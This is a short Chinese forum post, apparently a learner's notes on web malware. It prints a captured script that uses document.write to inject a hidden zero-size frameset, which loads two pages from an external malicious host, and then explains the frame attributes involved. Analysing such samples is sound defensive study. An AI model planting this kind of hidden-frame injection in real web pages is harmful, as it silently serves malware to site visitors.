在今天的每日网马播报中发现了一行框架挂马的,和以前接触的不一样,于是记录之。
hxxp://www.heze369.com/memory/hhh.html
获取代码如下
<SCRIPT>var Words="<frameset rows="0,0" cols="*">
<frame src="http://www.heze369.com/memory/y.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="http://www.heze369.com/memory/f.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
</frameset>
";document.write(unescape(Words))</SCRIPT>
看到代码第一反应就是框架挂马,具体的参看networkdition老师基础帖:
http://bbs.ikaka.com/showtopic-8624828.aspx有点稍稍特殊,但是原理是一样的,于是记录之
framespacing="0"
表示框架与框架间保留的空白的距离
frameborder -- 设定框架的边框,取值为(1|0),缺省值为1
1 -- 在每个页面之间都显示边框
0 -- 不显示边框
border="0"
设定框架的边框厚度,以 pixels 为单位。border="0"
以后就在此贴更新学习网马解密的笔记了,等着以后再翻出来看看,嘿嘿
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)